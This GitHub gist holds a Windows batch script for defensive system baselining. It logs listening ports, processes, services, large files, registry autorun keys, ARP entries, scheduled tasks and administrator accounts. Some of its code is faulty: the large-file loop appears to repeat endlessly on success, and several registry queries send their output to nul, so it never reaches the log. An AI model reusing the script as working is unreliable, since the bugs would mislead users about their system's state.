Skip to content

Instantly share code, notes, and snippets.

@blacklabssecurity

blacklabssecurity/systemBaseline.bat

Last active September 7, 2018 17:29
Show Gist options
  • Save blacklabssecurity/47956c8f69f9ee328ad3da69e1b8a054 to your computer and use it in GitHub Desktop.
Save blacklabssecurity/47956c8f69f9ee328ad3da69e1b8a054 to your computer and use it in GitHub Desktop.
Download ZIP
Windows Batch used to create system baselines
Raw
systemBaseline.bat
@ECHO OFF
@REM Logic used to create system baselines and output to log files
@REM Requires elevated privileges
@SETLOCAL ENABLEDELAYEDEXPANSION
@REM Use WMIC to retrieve date and time
@ECHO OFF
for /f %%x in ('wmic path win32_localtime get /format:list ^| findstr "="') do set %%x
set TODAY=%Month%-%Day%-%Year%
@REM Creation of directory to store log files
mkdir "c:\windows\system32\systemBaseline" > nul 2> nul
SET LOGDIR=C:\windows\system32\systemBaseline
@REM # Custom Welcome Banner
cls
@echo on
@echo *****************************************************************
@echo * ____ __ ___ ___ *
@echo * / __/_ _____ / /____ __ _ / _ )___ ____ ___ / (_)__ ___ *
@echo * _\ \/ // (_-/ __ / -_) ' \ / _ / _ \`(_-/ -_) / / _ \/ -_)*
@echo * /___/\_, /___/\__/\__/_/_/_/ /____/\_,_/___/\__/_/_/_//_/\__/ *
@echo * /___/ *
@echo * *
@echo *****************************************************************
@ECHO.
@ECHO.
@echo ========= System Baseline Creation for System Monitoring ========
@ECHO OFF
@REM ####################################################
@ECHO OFF
pause
goto PortListeners
:PortListeners
@ECHO OFF
@REM ####################################################
@ECHO.
@echo ===================================
@echo Searching for ports listeners...
@echo ===================================
@ECHO OFF
@echo ############################################################ > %LOGDIR%/portListeners_%TODAY%.log
@echo ############ netstat Analysis for port listeners ########### >> %LOGDIR%/portListeners_%TODAY%.log
@echo ############################################################ >> %LOGDIR%/portListeners_%TODAY%.log
netstat -naob >> %LOGDIR%/portListeners_%TODAY%.log
@REM -na will display listening TCP and UDP ports.
@REM -o flag will display the Process ID associated to the ports.
@REM -b flag works with Win7 - Win10 and will display the associated EXE's and DLL's as well (Requires Elevated Privileges)
@echo on
@echo It is important to discover what ports are usually open on your system to determine if a rouge port has been established.
@ECHO.
@echo Results have been recorded to a .log file in the %LOGDIR% dir with a name of 'portListeners_%TODAY%'.
@ECHO.
@echo Be sure to keep an eye out for unusual listening ports on your system.
@REM ####################################################
@ECHO OFF
pause
goto Processes
:Processes
@ECHO OFF
@REM ####################################################
@ECHO.
@echo ===================================
@echo System Processes:
@echo ===================================
@ECHO.
@echo Lets create a baseline at boot to dertermine our 'normal' processes.
@ECHO.
@echo ########################################################### > %LOGDIR%/processes_%TODAY%.log
@echo ############ tasklist View of Running Processes ########### >> %LOGDIR%/processes_%TODAY%.log
@echo ########################################################### >> %LOGDIR%/processes_%TODAY%.log
@echo Querying for all system processes now...
tasklist /v >> %LOGDIR%/processes_%TODAY%.log
@ECHO.
@echo All current running processes are recorded to a .log file in the %LOGDIR% dir with a name of 'processes_%TODAY%'.
@ECHO.
@echo Be sure to keep an eye on your system overtime to determine if rouge processes have been executed.
@ECHO.
@echo You can further investigate any identified process with the 'wmic process list full' command.
@ECHO.
@echo Such information would include the command invocation of the process as well as the ParentProcess ID.
@REM ####################################################
@ECHO OFF
pause
goto Services
:Services
@ECHO.
@REM ####################################################
@ECHO.
@echo ===================================
@echo System Services:
@echo ===================================
@ECHO.
@echo Lets create a baseline at boot to dertermine our 'normal' services.
@ECHO.
@echo ########################################################### > %LOGDIR%/servicesStarted_%TODAY%.log
@echo ############## System View of Started Services ############ >> %LOGDIR%/servicesStarted_%TODAY%.log
@echo ########################################################### >> %LOGDIR%/servicesStarted_%TODAY%.log
@echo Querying for system services files now...
sc query >> %LOGDIR%/servicesStarted_%TODAY%.log
@ECHO.
@echo The output will display the service that have been started on the system.
@ECHO.
@echo Results have been recorded to a .log file in the %LOGDIR% dir with a name of 'servicesStarted_%TODAY%'.
@ECHO.
@echo Be sure to keep an eye on your system overtime to determine if rouge services have been started.
@REM #####################
@ECHO.
@echo ############################################################ > %LOGDIR%/service2Processes_%TODAY%.log
@echo ############# tasklist View of Started Services ############ >> %LOGDIR%/service2Processes_%TODAY%.log
@echo ############################################################ >> %LOGDIR%/service2Processes_%TODAY%.log
@echo Mapping System Services to Process now...
tasklist /svc >> %LOGDIR%/service2Processes_%TODAY%.log
@ECHO.
@echo The output will display how system services are mapping to the system processes they are running out of.
@ECHO.
@echo Results have been recorded to a .log file in the %LOGDIR% dir with a name of 'service2Processes_%TODAY%'.
@ECHO.
@echo Be sure to keep an eye on your system overtime to determine if rouge services have been started.
@REM ####################################################
@ECHO OFF
pause
goto UnusualFiles
:UnusualFiles
@ECHO.
@REM ####################################################
@ECHO.
@echo ================================
@echo Identify LARGE System Files:
@echo ================================
@ECHO.
@echo Lets search the system to identify any 'LARGE' files (Modify file size appropriately).
@ECHO.
@echo ############################################################ > %LOGDIR%/10MB+Files_%TODAY%.log
@echo #################### LARGE System Files #################### >> %LOGDIR%/10MB+Files_%TODAY%.log
@echo ############################################################ >> %LOGDIR%/10MB+Files_%TODAY%.log
@echo Querying for LARGE files now...
:WAITLOOP
forfiles /S /P c:\ /M * /C "cmd /c if @fsize GEQ 10000000 echo @path - [ @fsize ]" >> %LOGDIR%/10MB+Files_%TODAY%.log
@REM FOR /R C:\ %I in (*) do @if %~zI gtr 10000000 echo %I %~zI >> %LOGDIR%/10MB+Files_%TODAY%.log
if "%ERRORLEVEL%"=="0" goto RUNNING
goto NOTRUNNING
:RUNNING
@REM Still querying...
goto WAITLOOP
:NOTRUNNING
@ECHO.
@echo Large file archives (10MB+) could be a sign of stolen software, password lists or other potentially malicious files.
@ECHO.
@echo Results have been recorded to a .log file in the %LOGDIR% dir with the name of '10MB+Files_%TODAY%'.
@ECHO.
@echo Be sure to keep an eye on your system overtime to determine if large files appear.
@REM ####################################################
@ECHO OFF
pause
goto RegistryCheck
:RegistryCheck
@ECHO.
@REM ####################################################
@ECHO.
@echo ===================================
@echo AutoRun Registry Settings:
@echo ===================================
@ECHO.
@echo Lets create a baseline of AutoRun Entries in the 'HKLM' and 'HKCU' Registry Keys
@ECHO.
@echo ############################################################ > %LOGDIR%/registryAutoRun_%TODAY%.log
@echo ################### HKLM Registry Entries ################## >> %LOGDIR%/registryAutoRun_%TODAY%.log
@echo ############################################################ >> %LOGDIR%/registryAutoRun_%TODAY%.log
@ECHO.
@echo Querying the Local Machine (HKLM) registry entries now...
@ECHO.
@echo ------------------------------------------------------------ >> %LOGDIR%/registryAutoRun_%TODAY%.log
@echo ----------((((( Run ENTIRES )))))---------- >> %LOGDIR%/registryAutoRun_%TODAY%.log
@echo ------------------------------------------------------------ >> %LOGDIR%/registryAutoRun_%TODAY%.log
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run 2> nul >> %LOGDIR%/registryAutoRun_%TODAY%.log
@ECHO.
@echo ------------------------------------------------------------ >> %LOGDIR%/registryAutoRun_%TODAY%.log
@echo ----------((((( RunOnce ENTIRES )))))---------- >> %LOGDIR%/registryAutoRun_%TODAY%.log
@echo ------------------------------------------------------------ >> %LOGDIR%/registryAutoRun_%TODAY%.log
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Runonce > nul 2> nul >> %LOGDIR%/registryAutoRun_%TODAY%.log
@ECHO.
@echo ------------------------------------------------------------ >> %LOGDIR%/registryAutoRun_%TODAY%.log
@echo ----------((((( RunOnceEx ENTIRES )))))---------- >> %LOGDIR%/registryAutoRun_%TODAY%.log
@echo ------------------------------------------------------------ >> %LOGDIR%/registryAutoRun_%TODAY%.log
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunonceEx > nul 2> nul >> %LOGDIR%/registryAutoRun_%TODAY%.log
@ECHO.
@echo ------------------------------------------------------------ >> %LOGDIR%/registryAutoRun_%TODAY%.log
@echo ----------((((( END )))))---------- >> %LOGDIR%/registryAutoRun_%TODAY%.log
@echo ------------------------------------------------------------ >> %LOGDIR%/registryAutoRun_%TODAY%.log
@ECHO.
@echo ############################################################ >> %LOGDIR%/registryAutoRun_%TODAY%.log
@echo ################### HKCU Registry Entries ################## >> %LOGDIR%/registryAutoRun_%TODAY%.log
@echo ############################################################ >> %LOGDIR%/registryAutoRun_%TODAY%.log
@ECHO.
@echo Querying the Current User registry entries now...
@ECHO.
@echo ------------------------------------------------------------ >> %LOGDIR%/registryAutoRun_%TODAY%.log
@echo ----------((((( Run ENTIRES )))))---------- >> %LOGDIR%/registryAutoRun_%TODAY%.log
@echo ------------------------------------------------------------ >> %LOGDIR%/registryAutoRun_%TODAY%.log
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run > nul 2> nul >> %LOGDIR%/registryAutoRun_%TODAY%.log
@ECHO.
@echo ------------------------------------------------------------ >> %LOGDIR%/registryAutoRun_%TODAY%.log
@echo ----------((((( RunOnce ENTIRES )))))---------- >> %LOGDIR%/registryAutoRun_%TODAY%.log
@echo ------------------------------------------------------------ >> %LOGDIR%/registryAutoRun_%TODAY%.log
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Runonce > nul 2> nul >> %LOGDIR%/registryAutoRun_%TODAY%.log
@ECHO.
@echo ------------------------------------------------------------ >> %LOGDIR%/registryAutoRun_%TODAY%.log
@echo ----------((((( RunOnceEx ENTIRES )))))---------- >> %LOGDIR%/registryAutoRun_%TODAY%.log
@echo ------------------------------------------------------------ >> %LOGDIR%/registryAutoRun_%TODAY%.log
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunonceEx > nul 2> nul >> %LOGDIR%/registryAutoRun_%TODAY%.log
@ECHO.
@echo ------------------------------------------------------------ >> %LOGDIR%/registryAutoRun_%TODAY%.log
@echo ----------((((( END )))))---------- >> %LOGDIR%/registryAutoRun_%TODAY%.log
@echo ------------------------------------------------------------ >> %LOGDIR%/registryAutoRun_%TODAY%.log
@ECHO.
@echo The registry entries have been queried for all processes executing at system boot and current user logon.
@ECHO.
@echo Results have been recorded to a .log file in the %LOGDIR% dir with the name of 'registryAutoRun_%TODAY%'.
@ECHO.
@echo Be sure to keep an eye on your system overtime to determine if rouge entries have been added to the registry.
@REM ####################################################
@ECHO OFF
pause
goto ARPEntries
:ARPEntries
@ECHO.
@REM ####################################################
@ECHO.
@echo =======================================
@echo Searching for all ARP associations...
@echo =======================================
@ECHO.
@echo Lets baseline the associated arp entries on the system.
@ECHO.
@echo ########################################################## > %LOGDIR%/arpAssociations_%TODAY%.log
@echo ##################### ARP Associations ################### >> %LOGDIR%/arpAssociations_%TODAY%.log
@echo ########################################################## >> %LOGDIR%/arpAssociations_%TODAY%.log
@echo Querying for LARGE files now...
arp -a >> %LOGDIR%/arpAssociations_%TODAY%.log
@ECHO.
@echo It is important to know your IP to MAC address associations in order to identify unusual mappings.
@ECHO.
@echo This may be dynamic on your LAN and ever changing. A baseline can assist in identifying MITM attacks.
@ECHO.
@echo MITM attempts can be countered with static arp entries for a systems GW or AP (deployed through GPO).
@ECHO.
@echo Results have been recorded to a .log file in the %LOGDIR% dir with the name of 'arpAssociations_%TODAY%'.
@ECHO.
@echo Be sure to keep an eye out for unusual mappings of known layer 3 addresses.
@REM ####################################################
@ECHO OFF
pause
goto ScheduledTasks
:ScheduledTasks
@ECHO OFF
@REM ####################################################
@ECHO.
@echo =====================================
@echo Searching for Scheduled Tasks...
@echo =====================================
@ECHO.
@echo ############################################################ > %LOGDIR%/scheduledTasks_%TODAY%.log
@echo ################## System Scheduled Tasks ################## >> %LOGDIR%/scheduledTasks_%TODAY%.log
@echo ############################################################ >> %LOGDIR%/scheduledTasks_%TODAY%.log
schtasks >> %LOGDIR%/scheduledTasks_%TODAY%.log
@ECHO.
@echo It is important to baseline the systems scheduled tasks to identify rouge tasks added to your system.
@ECHO.
@echo Results have been recorded to a .log file in the %LOGDIR% dir with the name of 'scheduledTasks_%TODAY%'.
@ECHO.
@echo You can delete tasks through command with elevated privileges: schtasks /delete /tn TaskNameToDelete
@REM ####################################################
@ECHO OFF
pause
goto Accounts
:Accounts
@ECHO.
@REM ####################################################
@ECHO.
@echo ########################################################### > %LOGDIR%/adminGroup_%TODAY%.log
@echo ############### Administrator Group Members ############### >> %LOGDIR%/adminGroup_%TODAY%.log
@echo ########################################################### >> %LOGDIR%/adminGroup_%TODAY%.log
net localgroup administrators >> %LOGDIR%/adminGroup_%TODAY%.log
@ECHO.
@echo It is important to baseline the admin accounts on the system.
@ECHO.
@echo Results have been recorded to a .log file in the %LOGDIR% dir with the name of 'adminGroup_%TODAY%'.
@ECHO.
@echo Details of the user accounts can be viewed throguh the Local User and Group console. Launching now...
start lusrmgr.msc
@REM ####################################################
@ECHO.
pause
goto LogEntries
:LogEntries
@ECHO.
@REM ####################################################
@ECHO.
@echo Be sure to regularly review the Event Viewer as well to identify items of consideration, such as failed logon events and unusual login events as well.
start secpol.msc
@ECHO OFF
@echo ===================================
@echo System Baseline has been created.
@echo ===================================
@ECHO OFF
@echo All log outputs have been recorded in the %LOGDIR% directory.
start "" "c:\windows\system32\systemBaseline\"
@REM ####################################################
@ECHO.
pause
goto end
:end
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment